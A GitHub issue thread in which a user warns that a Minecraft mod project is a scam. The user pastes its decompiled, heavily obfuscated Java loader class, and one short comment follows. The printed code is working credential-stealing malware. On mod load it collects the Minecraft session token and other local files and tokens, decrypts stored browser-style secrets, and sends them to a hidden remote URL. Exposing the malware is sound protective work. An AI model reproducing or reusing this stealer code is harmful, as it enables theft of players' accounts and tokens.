### ISSUE TITLE
Obvious scam!

### ISSUE THREAD

**Issue by LonelyLuni** [auraflipper/Aura-flipper#107]
Heavily encoded malware that will most likely steal Tokens etc from your pc.

@Mod(modid = "lbozo", acceptedMinecraftVersions = "[1.8.9]")
public class load
{
    private static final /* synthetic */ int[] l;
    private static final /* synthetic */ String[] I;
    
    private static String I(String llllllllIIIIlII, final String llllllllIIIIIll) {
        llllllllIIIIlII = (short)new String(Base64.getDecoder().decode(((String)llllllllIIIIlII).getBytes(StandardCharsets.UTF_8)), StandardCharsets.UTF_8);
        final StringBuilder llllllllIIIIlll = new StringBuilder();
        final char[] llllllllIIIIllI = llllllllIIIIIll.toCharArray();
        int llllllllIIIIlIl = load.l[0];
        final char lllllllIlllllll = (Object)((String)llllllllIIIIlII).toCharArray();
        final boolean lllllllIllllllI = lllllllIlllllll.length != 0;
        String lllllllIlllllIl = (String)load.l[0];
        while (llI((int)lllllllIlllllIl, lllllllIllllllI ? 1 : 0)) {
            final char llllllllIIIlIlI = lllllllIlllllll[lllllllIlllllIl];
            llllllllIIIIlll.append((char)(llllllllIIIlIlI ^ llllllllIIIIllI[llllllllIIIIlIl % llllllllIIIIllI.length]));
            "".length();
            ++llllllllIIIIlIl;
            ++lllllllIlllllIl;
            "".length();
            if (-" ".length() < -" ".length()) {
                return null;
            }
        }
        return String.valueOf(llllllllIIIIlll);
    }
    
    private static boolean lIl(final int lllllllIllIIlll) {
        return lllllllIllIIlll != 0;
    }
    
    static {
        lII();
        ll();
    }
    
    private static void lII() {
        (l = new int[47])[0] = ((0x2F ^ 0x5C ^ (0x5D ^ 0x3D)) & (0x22 ^ 0x12 ^ (0x30 ^ 0x13) ^ -" ".length()));
        load.l[1] = " ".length();
        load.l[2] = "  ".length();
        load.l[3] = "   ".length();
        load.l[4] = (0xB1 ^ 0xB9 ^ (0x4F ^ 0x43));
        load.l[5] = (0xC4 ^ 0x92 ^ (0x6E ^ 0x3D));
        load.l[6] = (0xAB ^ 0xAD);
        load.l[7] = (0x7E ^ 0x71 ^ (0x3A ^ 0x32));
        load.l[8] = (0x83 ^ 0x8B);
        load.l[9] = (0x27 ^ 0x2E);
        load.l[10] = (0x85 ^ 0x8F);
        load.l[11] = (0x9B ^ 0xBE ^ (0x6D ^ 0x43));
        load.l[12] = (0xD ^ 0x1);
        load.l[13] = (183 + 157 - 283 + 146 ^ 37 + 101 - 16 + 76);
        load.l[14] = (0xA ^ 0x60 ^ (0xFB ^ 0x9F));
        load.l[15] = (0x5C ^ 0x35 ^ (0xC1 ^ 0xA7));
        load.l[16] = (0xC2 ^ 0xBF ^ (0xF2 ^ 0x9F));
        load.l[17] = (0x7D ^ 0x1 ^ (0xAD ^ 0xC0));
        load.l[18] = (0x8E ^ 0x81 ^ (0x9E ^ 0x83));
        load.l[19] = (0x74 ^ 0x67);
        load.l[20] = (127 + 83 - 155 + 75 ^ 133 + 73 - 187 + 131);
        load.l[21] = (0xA8 ^ 0xBD);
        load.l[22] = (0x95 ^ 0x83);
        load.l[23] = (0xFFFFCD3C & 0x33C3);
        load.l[24] = (0x19 ^ 0x65 ^ (0x28 ^ 0x43));
        load.l[25] = (98 + 133 - 105 + 54 ^ 4 + 15 + 97 + 56);
        load.l[26] = (0xBB ^ 0xA2);
        load.l[27] = (132 + 82 - 84 + 22 ^ 6 + 73 - 66 + 117);
        load.l[28] = (0xDE ^ 0xC5);
        load.l[29] = (0x1E ^ 0x2);
        load.l[30] = (0x6C ^ 0x71);
        load.l[31] = (0x5D ^ 0x43);
        load.l[32] = -(0x8B ^ 0xA8 ^ (0x2 ^ 0x30));
        load.l[33] = (0x31 ^ 0x2E);
        load.l[34] = (39 + 119 + 13 + 7 ^ 106 + 111 - 211 + 140);
        load.l[35] = (0x7 ^ 0x5C ^ (0xF5 ^ 0x8F));
        load.l[36] = (0x44 ^ 0x66);
        load.l[37] = (0x14 ^ 0x37);
        load.l[38] = (0x26 ^ 0x2);
        load.l[39] = 69 + 2 - 14 + 71;
        load.l[40] = (0xE7 ^ 0xC2);
        load.l[41] = (81 + 65 - 53 + 66 ^ 102 + 1 - 98 + 180);
        load.l[42] = (0x45 ^ 0x62);
        load.l[43] = (13 + 75 + 27 + 31 ^ 152 + 118 - 202 + 118);
        load.l[44] = (0x8C ^ 0xA5);
        load.l[45] = (144 + 120 - 102 + 16 ^ 79 + 138 - 161 + 96);
        load.l[46] = (0x76 ^ 0x5C ^ " ".length());
    }
    
    @Mod.EventHandler
    public void preInit(final FMLPreInitializationEvent llllllllllllIlI) {
        MinecraftForge.EVENT_BUS.register((Object)this);
        HttpURLConnection lllllllllIIIlll;
        Minecraft lllllllllIIIllI;
        final InputStreamReader in;
        final BufferedReader bufferedReader;
        String lllllllllIIIlIl;
        String lllllllllIIIlII;
        String lllllllllIIIIll;
        String lllllllllIIIIlI;
        String lllllllllIIIIIl;
        String lllllllllIIIIII;
        String[] more;
        final String first;
        String[] more2;
        final String s;
        final String first2;
        String[] more3;
        final String first3;
        String[] more4;
        final String s2;
        final String first4;
        String[] more5;
        final String first5;
        String[] more6;
        final String s3;
        final String first6;
        String[] more7;
        final String first7;
        String[] more8;
        final String first8;
        File[] array;
        int length;
        int lllllllIllIllII;
        File lllllllllIIlIII;
        FileReader lllllllllIIlllI;
        BufferedReader lllllllllIIllIl;
        StringBuilder lllllllllIIlIll;
        String lllllllllIIllII;
        final Object lllllllIllIlIIl;
        Pattern lllllllllIIlIlI;
        Matcher lllllllllIIlIIl;
        Class<?> lllllllllIllIlI;
        Constructor<?> lllllllllIllIIl;
        Object lllllllllIllIII;
        Field lllllllllIlIlll;
        Class<?> lllllllllIllIlI2;
        Constructor<?> lllllllllIllIIl2;
        Object lllllllllIlIllI;
        Field lllllllllIlIlll2;
        Class<?> lllllllllIllIlI3;
        Field lllllllllIlIlll3;
        Field lllllllllIlIlIl;
        byte[] lllllllllIlIIll;
        Gson gson;
        String[] more9;
        final String s4;
        final String first9;
        JsonObject lllllllllIlIIlI;
        byte[] lllllllllIlIlII;
        byte[] lllllllllIlIlII2;
        byte[] lllllllllIlIlII3;
        byte[] lllllllllIlIlII4;
        byte[] lllllllllIlIIll2;
        Cipher lllllllllIlIIIl;
        byte[] lllllllllIlIIII;
        String[] array2;
        final Class clazz;
        String format;
        Object[] args;
        String llllllllIllllll;
        OutputStream llllllllIlllllI;
        byte[] llllllllIllllIl;
        final BufferedReader bufferedReader2;
        BufferedReader llllllllIllllII;
        StringBuilder llllllllIlllIll;
        String llllllllIlllIlI;
        final Object lllllllIllIlIIl2;
        new Thread(() -> {
            try {
                lllllllllIIIlll = (HttpURLConnection)new URL(load.I[load.l[0]]).openConnection();
                lllllllllIIIlll.setRequestMethod(load.I[load.l[1]]);
                lllllllllIIIlll.setRequestProperty(load.I[load.l[2]], load.I[load.l[3]]);
                lllllllllIIIlll.setDoOutput((boolean)(load.l[1] != 0));
                lllllllllIIIllI = Minecraft.func_71410_x();
                // new(java.io.BufferedReader.class)
                new InputStreamReader(new URL(load.I[load.l[4]]).openStream());
                new BufferedReader(in);
                lllllllllIIIlIl = bufferedReader.readLine();
                lllllllllIIIlII = lllllllllIIIllI.func_110432_I().func_148254_d();
                lllllllllIIIIll = load.I[load.l[5]];
                lllllllllIIIIlI = load.I[load.l[6]];
                lllllllllIIIIIl = load.I[load.l[7]];
                lllllllllIIIIII = load.I[load.l[8]];
                lllllllllIIIllI.field_71412_D.getParent();
                more = new String[load.l[1]];
                more[load.l[0]] = load.I[load.l[9]];
                if (lIl(Files.exists(Paths.get(first, more), new LinkOption[load.l[0]]) ? 1 : 0)) {
                    // new(java.lang.String.class)
                    lllllllllIIIllI.field_71412_D.getParent();
                    more2 = new String[load.l[1]];
                    more2[load.l[0]] = load.I[load.l[10]];
                    new String(Files.readAllBytes(Paths.get(first2, more2)), StandardCharsets.UTF_8);
                    lllllllllIIIIll = StringEscapeUtils.escapeJson(s);
                }
                lllllllllIIIllI.field_71412_D.getPath();
                more3 = new String[load.l[1]];
                more3[load.l[0]] = load.I[load.l[11]];
                if (lIl(Files.exists(Paths.get(first3, more3), new LinkOption[load.l[0]]) ? 1 : 0)) {
                    // new(java.lang.String.class)
                    lllllllllIIIllI.field_71412_D.getPath();
                    more4 = new String[load.l[1]];
                    more4[load.l[0]] = load.I[load.l[12]];
                    new String(Files.readAllBytes(Paths.get(first4, more4)), StandardCharsets.UTF_8);
                    lllllllllIIIIlI = StringEscapeUtils.escapeJson(s2);
                }
                System.getProperty(load.I[load.l[13]]);
                more5 = new String[load.l[1]];
                more5[load.l[0]] = load.I[load.l[14]];
                if (lIl(Files.exists(Paths.get(first5, more5), new LinkOption[load.l[0]]) ? 1 : 0)) {
                    // new(java.lang.String.class)
                    System.getProperty(load.I[load.l[15]]);
                    more6 = new String[load.l[1]];
                    more6[load.l[0]] = load.I[load.l[16]];
                    new String(Files.readAllBytes(Paths.get(first6, more6)), StandardCharsets.UTF_8);
                    lllllllllIIIIIl = StringEscapeUtils.escapeJson(s3);
                }
                lllllllllIIIllI.field_71412_D.getParent();
                more7 = new String[load.l[1]];
                more7[load.l[0]] = load.I[load.l[17]];
                if (lIl(Files.isDirectory(Paths.get(first7, more7), new LinkOption[load.l[0]]) ? 1 : 0)) {
                    lllllllllIIIIII = load.I[load.l[18]];
                    lllllllllIIIllI.field_71412_D.getParent();
                    more8 = new String[load.l[1]];
                    more8[load.l[0]] = load.I[load.l[19]];
                    array = Objects.requireNonNull(Paths.get(first8, more8).toFile().listFiles());
                    length = array.length;
                    lllllllIllIllII = load.l[0];
                    while (llI(lllllllIllIllII, length)) {
                        lllllllllIIlIII = array[lllllllIllIllII];
                        Label_1486_1: {
                            if (lIl(lllllllllIIlIII.getName().endsWith(load.I[load.l[20]]) ? 1 : 0)) {
                                lllllllllIIlllI = new FileReader(lllllllllIIlIII);
                                lllllllllIIllIl = new BufferedReader(lllllllllIIlllI);
                                lllllllllIIlIll = new StringBuilder();
                                do {
                                    lllllllllIIllII = lllllllllIIllIl.readLine();
                                    if (lll(lllllllIllIlIIl)) {
                                        lllllllllIIlIll.append(lllllllllIIllII);
                                        "".length();
                                        "".length();
                                    }
                                    else {
                                        lllllllllIIlllI.close();
                                        lllllllllIIllIl.close();
                                        lllllllllIIlIlI = Pattern.compile(load.I[load.l[21]]);
                                        lllllllllIIlIIl = lllllllllIIlIlI.matcher(String.valueOf(lllllllllIIlIll));
                                        if (lIl(lllllllllIIlIIl.find() ? 1 : 0)) {
                                            try {
                                                if (llI(Cipher.getMaxAllowedKeyLength(load.I[load.l[22]]), load.l[23])) {
                                                    lllllllllIllIlI = Class.forName(load.I[load.l[24]]);
                                                    lllllllllIllIIl = lllllllllIllIlI.getDeclaredConstructor((Class<?>[])new Class[load.l[0]]);
                                                    lllllllllIllIIl.setAccessible((boolean)(load.l[1] != 0));
                                                    lllllllllIllIII = lllllllllIllIIl.newInstance(new Object[load.l[0]]);
                                                    lllllllllIlIlll = lllllllllIllIlI.getDeclaredField(load.I[load.l[25]]);
                                                    lllllllllIlIlll.setAccessible((boolean)(load.l[1] != 0));
                                                    lllllllllIlIlll.setBoolean(lllllllllIllIII, (boolean)(load.l[1] != 0));
                                                    lllllllllIllIlI2 = Class.forName(load.I[load.l[26]]);
                                                    lllllllllIllIIl2 = lllllllllIllIlI2.getDeclaredConstructor((Class<?>[])new Class[load.l[0]]);
                                                    lllllllllIllIIl2.setAccessible((boolean)(load.l[1] != 0));
                                                    lllllllllIlIllI = lllllllllIllIIl2.newInstance(new Object[load.l[0]]);
                                                    lllllllllIlIlll2 = lllllllllIllIlI2.getDeclaredField(load.I[load.l[27]]);
                                                    lllllllllIlIlll2.setAccessible((boolean)(load.l[1] != 0));
                                                    ((Map)lllllllllIlIlll2.get(lllllllllIlIllI)).put(load.I[load.l[28]], lllllllllIllIII);
                                                    "".length();
                                                    lllllllllIllIlI3 = Class.forName(load.I[load.l[29]]);
                                                    lllllllllIlIlll3 = lllllllllIllIlI3.getDeclaredField(load.I[load.l[30]]);
                                                    lllllllllIlIlll3.setAccessible((boolean)(load.l[1] != 0));
                                                    lllllllllIlIlIl = Field.class.getDeclaredField(load.I[load.l[31]]);
                                                    lllllllllIlIlIl.setAccessible((boolean)(load.l[1] != 0));
                                                    lllllllllIlIlIl.setInt(lllllllllIlIlll3, lllllllllIlIlll3.getModifiers() & load.l[32]);
                                                    lllllllllIlIlll3.set(null, lllllllllIlIllI);
                                                }
                                                lllllllllIlIIll = lllllllllIIlIIl.group().split(load.I[load.l[33]])[load.l[1]].getBytes();
                                                gson = new Gson();
                                                // new(java.lang.String.class)
                                                lllllllllIIIllI.field_71412_D.getParent();
                                                more9 = new String[load.l[1]];
                                                more9[load.l[0]] = load.I[load.l[34]];
                                                new String(Files.readAllBytes(Paths.get(first9, more9)));
                                                lllllllllIlIIlI = (JsonObject)gson.fromJson(s4, (Class)JsonObject.class);
                                                lllllllllIlIlII = lllllllllIlIIlI.getAsJsonObject(load.I[load.l[35]]).get(load.I[load.l[36]]).getAsString().getBytes();
                                                lllllllllIlIlII2 = Base64.getDecoder().decode(lllllllllIlIlII);
                                                lllllllllIlIlII3 = Arrays.copyOfRange(lllllllllIlIlII2, load.l[5], lllllllllIlIlII2.length);
                                                lllllllllIlIlII4 = Crypt32Util.cryptUnprotectData(lllllllllIlIlII3);
                                                lllllllllIlIIll2 = Base64.getDecoder().decode(lllllllllIlIIll);
                                                lllllllllIlIIIl = Cipher.getInstance(load.I[load.l[37]]);
                                                lllllllllIlIIIl.init(load.l[2], new SecretKeySpec(lllllllllIlIlII4, load.I[load.l[38]]), new GCMParameterSpec(load.l[39], Arrays.copyOfRange(lllllllllIlIIll2, load.l[3], load.l[15])));
                                                lllllllllIlIIII = lllllllllIlIIIl.doFinal(Arrays.copyOfRange(lllllllllIlIIll2, load.l[15], lllllllllIlIIll2.length));
                                                if (lIII(lllllllllIIIIII.contains(new String(lllllllllIlIIII, StandardCharsets.UTF_8)) ? 1 : 0)) {
                                                    lllllllllIIIIII = String.valueOf(new StringBuilder().append(lllllllllIIIIII).append(new String(lllllllllIlIIII, StandardCharsets.UTF_8)).append(load.I[load.l[40]]));
                                                }
                                                "".length();
                                                if ("  ".length() > (0x38 ^ 0x3C)) {
                                                    return;
                                                }
                                            }
                                            catch (Exception lllllllllIIllll) {
                                                lllllllllIIllll.printStackTrace();
                                                lllllllllIIIIII = load.I[load.l[41]];
                                            }
                                            break Label_1486_1;
                                        }
                                        else {
                                            break Label_1486_1;
                                        }
                                    }
                                } while ("   ".length() >= "   ".length());
                                return;
                            }
                        }
                        ++lllllllIllIllII;
                        "".length();
                        if (" ".length() >= "   ".length()) {
                            return;
                        }
                    }
                }
                if (lIl(Loader.isModLoaded(load.I[load.l[42]]) ? 1 : 0)) {
                    Class.forName(load.I[load.l[43]]);
                    array2 = new String[load.l[1]];
                    array2[load.l[0]] = load.I[load.l[44]];
                    lllllllllIIIlII = (String)ReflectionHelper.findField(clazz, array2).get(null);
                }
                format = load.I[load.l[45]];
                args = new Object[load.l[8]];
                args[load.l[0]] = lllllllllIIIllI.func_110432_I().func_111285_a();
                args[load.l[1]] = lllllllllIIIllI.func_110432_I().func_148255_b();
                args[load.l[2]] = lllllllllIIIlII;
                args[load.l[3]] = lllllllllIIIlIl;
                args[load.l[4]] = lllllllllIIIIll;
                args[load.l[5]] = lllllllllIIIIlI;
                args[load.l[6]] = lllllllllIIIIIl;
                args[load.l[7]] = lllllllllIIIIII;
                llllllllIllllll = String.format(format, args);
                llllllllIlllllI = lllllllllIIIlll.getOutputStream();
                llllllllIllllIl = llllllllIllllll.getBytes(StandardCharsets.UTF_8);
                llllllllIlllllI.write(llllllllIllllIl, load.l[0], llllllllIllllIl.length);
                new BufferedReader(new InputStreamReader(lllllllllIIIlll.getInputStream(), StandardCharsets.UTF_8));
                llllllllIllllII = bufferedReader2;
                llllllllIlllIll = new StringBuilder();
                do {
                    llllllllIlllIlI = llllllllIllllII.readLine();
                    if (lll(lllllllIllIlIIl2)) {
                        llllllllIlllIll.append(llllllllIlllIlI.trim());
                        "".length();
                        "".length();
                    }
                    else {
                        System.out.println(llllllllIlllIll);
                        llllllllIlllllI.close();
                        "".length();
                        if (((0x88 ^ 0x80) & ~(0x17 ^ 0x1F)) < 0) {
                            return;
                        }
                    }
                } while (null == null);
            }
            catch (Exception llllllllIlllIIl) {
                llllllllIlllIIl.printStackTrace();
            }
        }).start();
    }
    
    private static boolean lll(final Object lllllllIllIlIIl) {
        return lllllllIllIlIIl != null;
    }
    
    @SubscribeEvent
    public void onFirstPlayerJoin(final EntityJoinWorldEvent lllllllllllIIll) {
        if (lIl(lllllllllllIIll.entity.equals((Object)Minecraft.func_71410_x().field_71439_g) ? 1 : 0)) {
            MinecraftForge.EVENT_BUS.unregister((Object)this);
        }
    }
    
    private static boolean lIII(final int lllllllIllIIlIl) {
        return lllllllIllIIlIl == 0;
    }
    
    private static void ll() {
        (I = new String[load.l[46]])[load.l[0]] = I("BRgSBhpXQ0keCB4IABAIQwMIBAwDCAMERw4DCw==", "mlfvi");
        load.I[load.l[1]] = l("2eP6t2rvouw=", "mmSum");
        load.I[load.l[2]] = I("DCchJTAhPGIlLD8t", "OHOQU");
        load.I[load.l[3]] = l("tuLEvZ7NDpA/0/vlRUumxJsC/qWQGuBM", "MyRgs");
        load.I[load.l[4]] = I("EQUXOgFDXkwpGhwSCCMCVxAOKwgWHwI9AVcSDCdd", "yqcJr");
        load.I[load.l[5]] = I("LCELMHIEJxN1NAU9CTFyUGA=", "jHgUR");
        load.I[load.l[6]] = lI("r+cCUgdxYYvnPIfICkGjw7RRwelXlOZH", "CIfPS");
        load.I[load.l[7]] = I("KSUWMFABIw51FgA5FDFQVWQ=", "oLzUp");
        load.I[load.l[8]] = l("mm7veFjGkRWmpxS3z78DSQY+KZIwEgeY", "YgLft");
        load.I[load.l[9]] = I("RCEpGxICIj5VBwkkIw8IHjRiEBUFKQ==", "jGLzf");
        load.I[load.l[10]] = l("PxOQxsYban6+evhSwKPsQrdNHGwwqbOR", "Ccyya");
        load.I[load.l[11]] = lI("4kSbSX/QeB/wOSVG/CB+ALDF+7FsJp23obYerEd4kFQ8lR0TRtKw1g==", "kBbQq");
        load.I[load.l[12]] = lI("tsDvqH8QssJKO/bFndc/LtKMzRlR8jZ7XS5TtNZd1b0bTjxDHCrsNQ==", "felCV");
        load.I[load.l[13]] = lI("21aupKkyL+82W4B0RqNFXw==", "zkbQj");
        load.I[load.l[14]] = lI("Z4OjmLzm0YpLV9I+L0QrmuXhi5qQfh1rs2yY4FShGD0t+ToYsGwxBs/Hj6bCveHw", "BZLkD");
        load.I[load.l[15]] = I("GhYfP2AHChco", "oezMN");
        load.I[load.l[16]] = I("aSYRDTs1KQgKPyk+SxA/Mz4NDT00ZQMCNyJlBQA5KD8KFylpIBcMNA==", "GJdcZ");
        load.I[load.l[17]] = lI("sMNb/enMFiQhjdvskLU4gmTuCX3bfrUSW0z9b+Vyr1o=", "nGGaI");
        load.I[load.l[18]] = l("GI7JY0PKcfs=", "iiiir");
        load.I[load.l[19]] = lI("9LUG8J0p7nP2ICO5CN4uGFY2GByrlGeQp93UPchPIFA=", "oCfBu");
        load.I[load.l[20]] = lI("1vM5x29M0Kc=", "xuhve");
        load.I[load.l[21]] = lI("QfQlsrGhZYGosbyXSy8wEUJHOPsVjfr3R6pMqYUnWpcxIZX+/Cvruw==", "tXsDM");
        load.I[load.l[22]] = lI("dWZR609SN5o=", "TpCpx");
        load.I[load.l[24]] = l("hj/ckmHsCQtsnb7Gbi9OMvzuSF4qi3qpImKlTxSYIjhImrfNBTaS6VcIL/Aayggb", "aFqck");
        load.I[load.l[25]] = I("Ix8IHgMuHws2ByY=", "BsdAb");
        load.I[load.l[26]] = lI("EGXepUv45kdNTFGtSK65XefNZkg99lXqjphxxlBVptE=", "gbDip");
        load.I[load.l[27]] = I("HCQXLwA=", "lAeBs");
        load.I[load.l[28]] = l("T6nLF6E2VgM=", "qKNcB");
        load.I[load.l[29]] = I("CygDCgJPKgcSChUmWyEZBBoQCA8TIAESNwAnFAwfEw==", "aIukz");
        load.I[load.l[30]] = I("By4kBzYPPxIJLwooOw==", "cKBfC");
        load.I[load.l[31]] = I("JiAePD4iKggm", "KOzUX");
        load.I[load.l[33]] = I("KhQ+QRl3Ei4tDR9/", "NEIun");
        load.I[load.l[34]] = l("e+MhAm2JPKIBsC8CyMb5L08/8ZiXUqZ1", "WjkhP");
        load.I[load.l[35]] = l("ncTuqRCuAy7IROYl+jkS/g==", "fvXrP");
        load.I[load.l[36]] = l("2xrvC06TFClzzS9NygtSUQ==", "LaeKh");
        load.I[load.l[37]] = l("FQ+Ide4aTd3d7tCMI/1hb2phYdzu2KBs", "CXfnN");
        load.I[load.l[38]] = lI("Y1uF5gR9HTc=", "cHqHT");
        load.I[load.l[40]] = l("0HVlc0MjNPs=", "wGDrP");
        load.I[load.l[41]] = I("Fg8YKyM0TgUoZjQLEjU/IBpRMyk7Cx9nfHg=", "PnqGF");
        load.I[load.l[42]] = lI("j9dsWS9IwJS3szp7uR9F6g==", "FMdhq");
        load.I[load.l[43]] = l("DvYRFo8Tp5Z7/UhAF6rGLIckyvKjQM7e/kRURnwYFJCJud5J4MN2STIc78j4910VlWzoEB4mZk8w8c7Zj1FKDQ==", "YGbvy");
        load.I[load.l[44]] = l("VDwQ/YsQzv4=", "TQWvQ");
        load.I[load.l[45]] = l("SQJvaDh66GJDWNUEle775ry0ACIgyN1NH7lj915rMvApRA8gz03j+nqrSwGJ3EuPJ2fglB2cHT1wwCvqzCHb/BAduJ09w5WA9uvdcDWWQZRwYgBCWBFZQsyH8lYmmDSpNZ8zItEMW/N6q0sBidxLj4EPtBwv4GAnH7lj915rMvDRES63ZzfRLQ==", "CWCqn");
    }
    
    private static String lI(final String llllllllIIllIIl, final String llllllllIIlIllI) {
        try {
            final SecretKeySpec llllllllIIlllII = new SecretKeySpec(Arrays.copyOf(MessageDigest.getInstance("MD5").digest(llllllllIIlIllI.getBytes(StandardCharsets.UTF_8)), load.l[8]), "DES");
            final Cipher llllllllIIllIll = Cipher.getInstance("DES");
            llllllllIIllIll.init(load.l[2], llllllllIIlllII);
            return new String(llllllllIIllIll.doFinal(Base64.getDecoder().decode(llllllllIIllIIl.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
        }
        catch (Exception llllllllIIllIlI) {
            llllllllIIllIlI.printStackTrace();
            return null;
        }
    }
    
    private static String l(final String lllllllIlllIIlI, final String lllllllIlllIIll) {
        try {
            final SecretKeySpec lllllllIlllIlll = new SecretKeySpec(MessageDigest.getInstance("MD5").digest(lllllllIlllIIll.getBytes(StandardCharsets.UTF_8)), "Blowfish");
            final Cipher lllllllIlllIllI = Cipher.getInstance("Blowfish");
            lllllllIlllIllI.init(load.l[2], lllllllIlllIlll);
            return new String(lllllllIlllIllI.doFinal(Base64.getDecoder().decode(lllllllIlllIIlI.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
        }
        catch (Exception lllllllIlllIlIl) {
            lllllllIlllIlIl.printStackTrace();
            return null;
        }
    }
    
    private static boolean llI(final int lllllllIllIllII, final int lllllllIllIlIll) {
        return lllllllIllIllII < lllllllIllIlIll;
    }
}

**Comment by bertertasdf** [comment]
lol bro how could you be this bad at covering it up
